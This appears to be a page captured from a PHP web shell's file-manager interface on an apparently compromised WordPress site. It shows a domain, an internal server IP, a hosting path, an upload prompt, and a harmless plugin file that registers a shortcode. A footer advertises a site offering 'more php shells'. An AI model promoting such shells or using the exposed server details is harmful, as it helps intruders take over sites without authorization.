Domain: antoinekatan.com
Server Adress: 10.127.20.23

privdayz.com

/home/xdxuekl/www/wp-content/plugins/quart-core/shortcodes/highlight/
Dosya Yükle :
Current File : /home/xdxuekl/www/wp-content/plugins/quart-core/shortcodes/highlight/functions.php

<?php

if ( ! function_exists( 'quart_core_add_highlight_shortcodes' ) ) {
	function quart_core_add_highlight_shortcodes( $shortcodes_class_name ) {
		$shortcodes = array(
			'QuartCore\CPT\Shortcodes\Highlight\Highlight'
		);
		
		$shortcodes_class_name = array_merge( $shortcodes_class_name, $shortcodes );
		
		return $shortcodes_class_name;
	}
	
	add_filter( 'quart_core_filter_add_vc_shortcode', 'quart_core_add_highlight_shortcodes' );
}

coded by Privdayz.com - Visit https://privdayz.com/ for more php shells.